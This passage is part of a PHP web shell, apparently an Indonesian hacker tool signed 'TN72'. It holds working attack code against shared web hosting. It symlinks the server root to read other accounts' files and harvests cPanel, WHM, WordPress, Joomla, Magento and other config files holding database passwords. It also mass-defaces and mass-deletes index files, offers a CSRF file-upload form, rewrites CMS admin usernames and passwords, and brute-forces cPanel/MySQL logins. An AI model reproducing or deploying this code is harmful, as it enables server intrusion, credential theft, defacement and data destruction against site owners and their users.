  908. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  909. flush();
  910. if(strlen(trim($domains[1][0])) > 2){
  911. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  912. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  913. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  914. <td>".$user['name']."</td>
  915. <td><a href='$full/008_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  916. flush();
  917. $dcount++;}}}
  918. echo "</table>";
  919. }else{
  920. $TEST=@file('/etc/passwd');
  921. if ($TEST){
  922. @mkdir("008_sym",0777);
  923. @chdir("008_sym");
  924. exe("ln -s / root");
  925. $file3 = 'Options Indexes FollowSymLinks
  926. DirectoryIndex 008.htm
  927. AddType text/plain .php
  928. AddHandler text/plain .php
  929. Satisfy Any';
  930. $fp3 = fopen('.htaccess','w');
  931. $fw3 = fwrite($fp3,$file3);
  932. @fclose($fp3);
  933. echo "
  934. <table align=center border=1><tr>
  935. <td align=center><font size=3>S. No.</font></td>
  936. <td align=center><font size=3>Users</font></td>
  937. <td align=center><font size=3>Symlink</font></td></tr>";
  938. $dcount = 1;
  939. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  940. while(!feof($file)){
  941. $s = fgets($file);
  942. $matches = array();
  943. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  944. $matches = str_replace("home/","",$matches[1]);
  945. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  946. continue;
  947. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  948. <td align=center><font class=txt>" . $matches . "</td>";
  949. echo "<td align=center><font class=txt><a href=$full/008_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  950. $dcount++;}fclose($file);
  951. echo "</table>";}else{if($os != "Windows"){@mkdir("008_sym",0777);@chdir("008_sym");@exe("ln -s / root");$file3 = '
  952. Options Indexes FollowSymLinks
  953. DirectoryIndex 008
  954. AddType text/plain .php
  955. AddHandler text/plain .php
  956. Satisfy Any
  957. ';
  958. $fp3 = fopen('.htaccess','w');
  959. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  960. echo "
  961. <center><h2 class='k2ll33d2'>Symlink Server</h2>
  962. <table align=center border=1><tr>
  963. <td align=center><font size=3>ID</font></td>
  964. <td align=center><font size=3>Users</font></td>
  965. <td align=center><font size=3>Symlink</font></td></tr>";
  966. $temp = "";$val1 = 0;$val2 = 1000;
  967. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  968. if ($uid)$temp .= join(':',$uid)."\n";}
  969. echo '<br/>';$temp = trim($temp);$file5 =
  970. fopen("test.txt","w");
  971. fputs($file5,$temp);
  972. fclose($file5);$dcount = 1;$file =
  973. fopen("test.txt", "r") or exit("Unable to open file!");
  974. while(!feof($file)){$s = fgets($file);$matches = array();
  975. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  976. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  977. continue;
  978. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  979. <td align=center><font class=txt>" . $matches . "</td>";
  980. echo "<td align=center><font class=txt><a href=$full/008_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  981. $dcount++;}
  982. fclose($file);
  983. echo "</table></div></center>";unlink("test.txt");
  984. } else
  985. echo "<center><font size=3>Cannot create Symlink</font></center>";
  986. }
  987. }
  988. ?>
  989. <?php
  990. } elseif($_GET['do'] == 'csrf') {
  991. ?>
  992. <html>
  993. <title>CSRF EXPLOITER ONLINE</title>
  994. <style>
  995. body{
  996. background-color: black;background-image: url("http://i66.tinypic.com/2bb8up.jpg") ;background-repeat:no-repeat ;background-size: 100% 100%;}
  997. }
  998. </style>
  999. <center><img src=https://image.ibb.co/kdXFbx/1524360437509.png height=300px width=300px>
  1000. <br><font color="#00FF00" face="Iceberg"><b>CSRF By Cy#b3r0ne<b><br>
  1001. <center>
  1002. <form method="post">
  1003. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1004. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br><input type="submit" name="d" value="Kunci Target!"><br><br><font color=#FFFF00>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1005. </form>
  1006. <?php
  1007. //gak penting
  1008. @$url = $_POST['url'];
  1009. @$pf = $_POST['pf'];
  1010. @$d = $_POST['d'];
  1011. if($d) {
  1012. //baccod
  1013.  
  1014. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  1015. }
  1016. ?>
  1017. </form>
  1018. </html>
  1019. <?php
  1020. } elseif($_GET['do'] == 'mass_deface') {
  1021. function sabun_massal($dir,$namafile,$isi_script) {
  1022. if(is_writable($dir)) {
  1023. $dira = scandir($dir);
  1024. foreach($dira as $dirb) {
  1025. $dirc = "$dir/$dirb";
  1026. $lokasi = $dirc.'/'.$namafile;
  1027. if($dirb === '.') {
  1028. file_put_contents($lokasi, $isi_script);
  1029. } elseif($dirb === '..') {
  1030. file_put_contents($lokasi, $isi_script);
  1031. } else {
  1032. if(is_dir($dirc)) {
  1033. if(is_writable($dirc)) {
  1034. echo "[<font color=#48D1CC>DONE</font>] $lokasi<br>";
  1035. file_put_contents($lokasi, $isi_script);
  1036. $idx = sabun_massal($dirc,$namafile,$isi_script);
  1037. }
  1038. }
  1039. }
  1040. }
  1041. }
  1042. }
  1043. function sabun_biasa($dir,$namafile,$isi_script) {
  1044. if(is_writable($dir)) {
  1045. $dira = scandir($dir);
  1046. foreach($dira as $dirb) {
  1047. $dirc = "$dir/$dirb";
  1048. $lokasi = $dirc.'/'.$namafile;
  1049. if($dirb === '.') {
  1050. file_put_contents($lokasi, $isi_script);
  1051. } elseif($dirb === '..') {
  1052. file_put_contents($lokasi, $isi_script);
  1053. } else {
  1054. if(is_dir($dirc)) {
  1055. if(is_writable($dirc)) {
  1056. echo "[<font color=#48D1CC>DONE</font>] $dirb/$namafile<br>";
  1057. file_put_contents($lokasi, $isi_script);
  1058. }
  1059. }
  1060. }
  1061. }
  1062. }
  1063. }
  1064. if($_POST['start']) {
  1065. if($_POST['tipe_sabun'] == 'mahal') {
  1066. echo "<div style='margin: 5px auto; padding: 5px'>";
  1067. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1068. echo "</div>";
  1069. } elseif($_POST['tipe_sabun'] == 'murah') {
  1070. echo "<div style='margin: 5px auto; padding: 5px'>";
  1071. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1072. echo "</div>";
  1073. }
  1074. } else {
  1075. echo "<center>";
  1076. echo "<form method='post'>
  1077. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1078. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  1079. <font style='text-decoration: underline;'>Folder:</font><br>
  1080. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1081. <font style='text-decoration: underline;'>Filename:</font><br>
  1082. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1083. <font style='text-decoration: underline;'>Index File:</font><br>
  1084. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by TN72</textarea><br>
  1085. <input type='submit' name='start' value='Mass Deface' style='width: 450px;' class='btn btn-success btn-sm'>
  1086. </form></center>";
  1087. }
  1088. } elseif($_GET['do'] == 'mass_delete') {
  1089. function hapus_massal($dir,$namafile) {
  1090. if(is_writable($dir)) {
  1091. $dira = scandir($dir);
  1092. foreach($dira as $dirb) {
  1093. $dirc = "$dir/$dirb";
  1094. $lokasi = $dirc.'/'.$namafile;
  1095. if($dirb === '.') {
  1096. if(file_exists("$dir/$namafile")) {
  1097. unlink("$dir/$namafile");
  1098. }
  1099. } elseif($dirb === '..') {
  1100. if(file_exists("".dirname($dir)."/$namafile")) {
  1101. unlink("".dirname($dir)."/$namafile");
  1102. }
  1103. } else {
  1104. if(is_dir($dirc)) {
  1105. if(is_writable($dirc)) {
  1106. if(file_exists($lokasi)) {
  1107. echo "[<font color=#18BC9C>DELETED</font>] $lokasi<br>";
  1108. unlink($lokasi);
  1109. $idx = hapus_massal($dirc,$namafile);
  1110. }
  1111. }
  1112. }
  1113. }
  1114. }
  1115. }
  1116. }
  1117. if($_POST['start']) {
  1118. echo "<div style='margin: 5px auto; padding: 5px'>";
  1119. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1120. echo "</div>";
  1121. } else {
  1122. echo "<center>";
  1123. echo "<form method='post'>
  1124. <font style='text-decoration: underline;'>Folder:</font><br>
  1125. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1126. <font style='text-decoration: underline;'>Filename:</font><br>
  1127. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1128. <input type='submit' name='start' value='Mass Delete' style='width: 450px;' class='btn btn-success btn-sm'>
  1129. </form></center>";
  1130. }
  1131. } elseif($_GET['do'] == 'config') {
  1132. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1133. $idx = mkdir("idx_config", 0777);
  1134. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1135. $htc = fopen("idx_config/.htaccess","w");
  1136. fwrite($htc, $isi_htc);
  1137. while($passwd = fgets($etc)) {
  1138. if($passwd == "" || !$etc) {
  1139. echo "<font color=red>Can't read /etc/passwd</font>";
  1140. } else {
  1141. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1142. foreach($user_config[1] as $user_idx) {
  1143. $user_config_dir = "/home/$user_idx/public_html/";
  1144. if(is_readable($user_config_dir)) {
  1145. $grab_config = array(
  1146. "/home/$user_idx/.my.cnf" => "cpanel",
  1147. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  1148. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  1149. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  1150. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  1151. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  1152. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1153. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  1154. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  1155. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  1156. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  1157. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  1158. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  1159. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  1160. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  1161. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  1162. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  1163. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  1164. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  1165. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  1166. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  1167. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  1168. foreach($grab_config as $config => $nama_config) {
  1169. $ambil_config = file_get_contents($config);
  1170. if($ambil_config == '') {
  1171. } else {
  1172. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  1173. fputs($file_config,$ambil_config);
  1174. }
  1175. }
  1176. }
  1177. }
  1178. }
  1179. }
  1180. echo "<center><a href='?dir=$dir/idx_config'><font color=#48D1CC>Done</font></a></center>";
  1181. } elseif($_GET['do'] == 'jumping') {
  1182. $i = 0;
  1183. echo "<div class='margin: 5px auto;'>";
  1184. if(preg_match("/hsphere/", $dir)) {
  1185. $urls = explode("\r\n", $_POST['url']);
  1186. if(isset($_POST['jump'])) {
  1187. echo "<pre>";
  1188. foreach($urls as $url) {
  1189. $url = str_replace(array("http://","www."), "", strtolower($url));
  1190. $etc = "/etc/passwd";
  1191. $f = fopen($etc,"r");
  1192. while($gets = fgets($f)) {
  1193. $pecah = explode(":", $gets);
  1194. $user = $pecah[0];
  1195. $dir_user = "/hsphere/local/home/$user";
  1196. if(is_dir($dir_user) === true) {
  1197. $url_user = $dir_user."/".$url;
  1198. if(is_readable($url_user)) {
  1199. $i++;
  1200. $jrw = "[<font color=#48D1CC>R</font>] <a href='?dir=$url_user'><font color=#48D1CC>$url_user</font></a>";
  1201. if(is_writable($url_user)) {
  1202. $jrw = "[<font color=#48D1CC>RW</font>] <a href='?dir=$url_user'><font color=#48D1CC>$url_user</font></a>";
  1203. }
  1204. echo $jrw."<br>";
  1205. }
  1206. }
  1207. }
  1208. }
  1209. if($i == 0) {
  1210. } else {
  1211. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1212. }
  1213. echo "</pre>";
  1214. } else {
  1215. echo '<center>
  1216. <form method="post">
  1217. List Domains: <br>
  1218. <textarea name="url" style="width: 500px; height: 250px;">';
  1219. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1220. while($getss = fgets($fp)) {
  1221. echo $getss;
  1222. }
  1223. echo '</textarea><br>
  1224. <input type="submit" value="Jumping" name="jump" class="btn btn-success btn-sm" style="width: 500px; height: 25px;">
  1225. </form></center>';
  1226. }
  1227. } elseif(preg_match("/vhosts/", $dir)) {
  1228. $urls = explode("\r\n", $_POST['url']);
  1229. if(isset($_POST['jump'])) {
  1230. echo "<pre>";
  1231. foreach($urls as $url) {
  1232. $web_vh = "/var/www/vhosts/$url/httpdocs";
  1233. if(is_dir($web_vh) === true) {
  1234. if(is_readable($web_vh)) {
  1235. $i++;
  1236. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$web_vh'><font color=#18BC9C>$web_vh</font></a>";
  1237. if(is_writable($web_vh)) {
  1238. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$web_vh'><font color=#18BC9C>$web_vh</font></a>";
  1239. }
  1240. echo $jrw."<br>";
  1241. }
  1242. }
  1243. }
  1244. if($i == 0) {
  1245. } else {
  1246. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1247. }
  1248. echo "</pre>";
  1249. } else {
  1250. echo '<center>
  1251. <form method="post">
  1252. List Domains: <br>
  1253. <textarea name="url" style="width: 500px; height: 250px;">';
  1254. bing("ip:$ip");
  1255. echo '</textarea><br>
  1256. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1257. </form></center>';
  1258. }
  1259. } else {
  1260. echo "<pre>";
  1261. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1262. while($passwd = fgets($etc)) {
  1263. if($passwd == '' || !$etc) {
  1264. echo "<font color=red>Can't read /etc/passwd</font>";
  1265. } else {
  1266. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1267. foreach($user_jumping[1] as $user_idx_jump) {
  1268. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1269. if(is_readable($user_jumping_dir)) {
  1270. $i++;
  1271. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$user_jumping_dir'><font color=#18BC9C>$user_jumping_dir</font></a>";
  1272. if(is_writable($user_jumping_dir)) {
  1273. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#18BC9C>$user_jumping_dir</font></a>";
  1274. }
  1275. echo $jrw;
  1276. if(function_exists('posix_getpwuid')) {
  1277. $domain_jump = file_get_contents("/etc/named.conf");
  1278. if($domain_jump == '') {
  1279. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1280. } else {
  1281. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1282. foreach($domains_jump[1] as $dj) {
  1283. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1284. $user_jumping_url = $user_jumping_url['name'];
  1285. if($user_jumping_url == $user_idx_jump) {
  1286. echo " => ( <u>$dj</u> )<br>";
  1287. break;
  1288. }
  1289. }
  1290. }
  1291. } else {
  1292. echo "<br>";
  1293. }
  1294. }
  1295. }
  1296. }
  1297. }
  1298. if($i == 0) {
  1299. } else {
  1300. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1301. }
  1302. echo "</pre>";
  1303. }
  1304. echo "</div>";
  1305. } elseif($_GET['do'] == 'auto_edit_user') {
  1306. if($_POST['hajar']) {
  1307. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1308. echo "username atau password harus lebih dari 6 karakter";
  1309. } else {
  1310. $user_baru = $_POST['user_baru'];
  1311. $pass_baru = md5($_POST['pass_baru']);
  1312. $conf = $_POST['config_dir'];
  1313. $scan_conf = scandir($conf);
  1314. foreach($scan_conf as $file_conf) {
  1315. if(!is_file("$conf/$file_conf")) continue;
  1316. $config = file_get_contents("$conf/$file_conf");
  1317. if(preg_match("/JConfig|joomla/",$config)) {
  1318. $dbhost = ambilkata($config,"host = '","'");
  1319. $dbuser = ambilkata($config,"user = '","'");
  1320. $dbpass = ambilkata($config,"password = '","'");
  1321. $dbname = ambilkata($config,"db = '","'");
  1322. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1323. $prefix = $dbprefix."users";
  1324. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1325. $db = mysql_select_db($dbname);
  1326. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1327. $result = mysql_fetch_array($q);
  1328. $id = $result['id'];
  1329. $site = ambilkata($config,"sitename = '","'");
  1330. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1331. echo "Config => ".$file_conf."<br>";
  1332. echo "CMS => Joomla<br>";
  1333. if($site == '') {
  1334. echo "Sitename => <font color=red>error, gak bisa ambil nama domain nya ..</font><br>";
  1335. } else {
  1336. echo "Sitename => $site<br>";
  1337. }
  1338. if(!$update OR !$conn OR !$db) {
  1339. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1340. } else {
  1341. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1342. }
  1343. mysql_close($conn);
  1344. } elseif(preg_match("/WordPress/",$config)) {
  1345. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1346. $dbuser = ambilkata($config,"DB_USER', '","'");
  1347. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1348. $dbname = ambilkata($config,"DB_NAME', '","'");
  1349. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1350. $prefix = $dbprefix."users";
  1351. $option = $dbprefix."options";
  1352. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1353. $db = mysql_select_db($dbname);
  1354. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1355. $result = mysql_fetch_array($q);
  1356. $id = $result[ID];
  1357. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1358. $result2 = mysql_fetch_array($q2);
  1359. $target = $result2[option_value];
  1360. if($target == '') {
  1361. $url_target = "Login => <font color=red>error, gak bisa ambil nama domain nyaa ..</font><br>";
  1362. } else {
  1363. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1364. }
  1365. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1366. echo "Config => ".$file_conf."<br>";
  1367. echo "CMS => Wordpress<br>";
  1368. echo $url_target;
  1369. if(!$update OR !$conn OR !$db) {
  1370. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1371. } else {
  1372. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1373. }
  1374. mysql_close($conn);
  1375. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1376. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1377. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1378. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1379. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1380. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1381. $prefix = $dbprefix."admin_user";
  1382. $option = $dbprefix."core_config_data";
  1383. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1384. $db = mysql_select_db($dbname);
  1385. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1386. $result = mysql_fetch_array($q);
  1387. $id = $result[user_id];
  1388. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1389. $result2 = mysql_fetch_array($q2);
  1390. $target = $result2[value];
  1391. if($target == '') {
  1392. $url_target = "Login => <font color=red>error, gak bisa ambil nama domain nyaa ..</font><br>";
  1393. } else {
  1394. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1395. }
  1396. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1397. echo "Config => ".$file_conf."<br>";
  1398. echo "CMS => Magento<br>";
  1399. echo $url_target;
  1400. if(!$update OR !$conn OR !$db) {
  1401. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1402. } else {
  1403. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1404. }
  1405. mysql_close($conn);
  1406. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1407. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1408. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1409. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1410. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1411. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1412. $prefix = $dbprefix."user";
  1413. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1414. $db = mysql_select_db($dbname);
  1415. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1416. $result = mysql_fetch_array($q);
  1417. $id = $result[user_id];
  1418. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1419. if($target == '') {
  1420. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1421. } else {
  1422. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1423. }
  1424. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1425. echo "Config => ".$file_conf."<br>";
  1426. echo "CMS => OpenCart<br>";
  1427. echo $url_target;
  1428. if(!$update OR !$conn OR !$db) {
  1429. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1430. } else {
  1431. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1432. }
  1433. mysql_close($conn);
  1434. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1435. $dbhost = ambilkata($config,'server = "','"');
  1436. $dbuser = ambilkata($config,'username = "','"');
  1437. $dbpass = ambilkata($config,'password = "','"');
  1438. $dbname = ambilkata($config,'database = "','"');
  1439. $prefix = "users";
  1440. $option = "identitas";
  1441. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1442. $db = mysql_select_db($dbname);
  1443. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1444. $result = mysql_fetch_array($q);
  1445. $target = $result[alamat_website];
  1446. if($target == '') {
  1447. $target2 = $result[url];
  1448. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1449. if($target2 == '') {
  1450. $url_target2 = "Login => <font color=red>error, gak bisa ambil nama domain nyaa ..</font><br>";
  1451. } else {
  1452. $cek_login3 = file_get_contents("$target2/adminweb/");
  1453. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1454. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1455. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1456. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1457. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1458. } else {
  1459. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font><br>";
  1460. }
  1461. }
  1462. } else {
  1463. $cek_login = file_get_contents("$target/adminweb/");
  1464. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1465. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1466. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1467. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1468. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1469. } else {
  1470. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>wkwk, next web aja yaa :v</font><br>";
  1471. }
  1472. }
  1473. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1474. echo "Config => ".$file_conf."<br>";
  1475. echo "CMS => Lokomedia<br>";
  1476. if(preg_match('/error, gak bisa ambil nama domain nya/', $url_target)) {
  1477. echo $url_target2;
  1478. } else {
  1479. echo $url_target;
  1480. }
  1481. if(!$update OR !$conn OR !$db) {
  1482. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1483. } else {
  1484. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1485. }
  1486. mysql_close($conn);
  1487. }
  1488. }
  1489. }
  1490. } else {
  1491. echo "<center>
  1492. <h1>Auto Edit User Config</h1>
  1493. <form method='post'>
  1494. DIR Config: <br>
  1495. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1496. Set User & Pass: <br>
  1497. <input type='text' name='user_baru' value='TN72' placeholder='user_baru'><br>
  1498. <input type='text' name='pass_baru' value='TN72' placeholder='pass_baru'><br>
  1499. <input type='submit' name='hajar' class='btn btn-success btn-sm' value='Hajar!' style='width: 215px;'>
  1500. </form>
  1501. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1502. ";
  1503. }
  1504. } elseif($_GET['do'] == 'cpanel') {
  1505. if($_POST['crack']) {
  1506. $usercp = explode("\r\n", $_POST['user_cp']);
  1507. $passcp = explode("\r\n", $_POST['pass_cp']);
  1508. $i = 0;
  1509. foreach($usercp as $ucp) {
  1510. foreach($passcp as $pcp) {
  1511. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1512. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1513. } else {
  1514. $_SESSION[$ucp] = "1";
  1515. $_SESSION[$pcp] = "1";
  1516. if($ucp == '' || $pcp == '') {
  1517.  
  1518. } else {
  1519. $i++;
  1520. if(function_exists('posix_getpwuid')) {
  1521. $domain_cp = file_get_contents("/etc/named.conf");
  1522. if($domain_cp == '') {
  1523. $dom = "<font color=red>gak bisa ambil nama domain nya</font>";
  1524. } else {
  1525. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1526. foreach($domains_cp[1] as $dj) {
  1527. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1528. $user_cp_url = $user_cp_url['name'];
  1529. if($user_cp_url == $ucp) {
  1530. $dom = "<a href='http://$dj/' target='_blank'><font color=#18BC9C>$dj</font></a>";
  1531. break;
  1532. }
  1533. }
  1534. }
  1535. } else {
  1536. $dom = "<font color=red>function is Disable by system</font>";
  1537. }
  1538. echo "username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>) domain ($dom)<br>";
  1539. }
  1540. }
  1541. }
  1542. }
  1543. }
  1544. if($i == 0) {
  1545. } else {
  1546. echo "<br>sukses nyolong ".$i." Cpanel by <font color=#18BC9C>GarudaTersakti72.</font>";
  1547. }
  1548. } else {
  1549. echo "<center>
  1550. <form method='post'>
  1551. USER: <br>
  1552. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1553. $_usercp = fopen("/etc/passwd","r");
  1554. while($getu = fgets($_usercp)) {
  1555. if($getu == '' || !$_usercp) {
  1556. echo "<font color=red>Can't read /etc/passwd</font>";
  1557. } else {
  1558. preg_match_all("/(.*?):x:/", $getu, $u);
  1559. foreach($u[1] as $user_cp) {
  1560. if(is_dir("/home/$user_cp/public_html")) {
